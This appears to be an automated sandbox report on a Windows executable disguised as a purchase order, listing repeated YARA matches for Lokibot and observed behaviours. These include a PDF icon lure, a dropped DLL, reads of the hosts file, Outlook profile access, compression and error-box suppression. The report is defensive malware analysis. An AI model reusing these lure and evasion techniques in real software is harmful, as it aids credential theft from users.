              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: Purchase Order #5000012803.exe
              Executable has a suspicious name (potential lure to open the executable)Show sources
              Source: Purchase Order #5000012803.exeStatic file information: Suspicious name
              Source: Purchase Order #5000012803.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0040604C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00404772
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040549C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_004029D4
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: String function: 00405B6F appears 42 times
              Source: Purchase Order #5000012803.exe, 00000000.00000003.659919332.00000000033DF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order #5000012803.exe
              Source: Purchase Order #5000012803.exe, 00000000.00000003.662407150.0000000003246000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order #5000012803.exe
              Source: Purchase Order #5000012803.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Purchase Order #5000012803.exeReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Users\user\Desktop\Purchase Order #5000012803.exeJump to behavior
              Source: Purchase Order #5000012803.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB0C.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@61/1
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: Binary string: wntdll.pdbUGP source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order #5000012803.exe PID: 7000, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_72B21000 push eax; ret
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: iconPdf.png
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
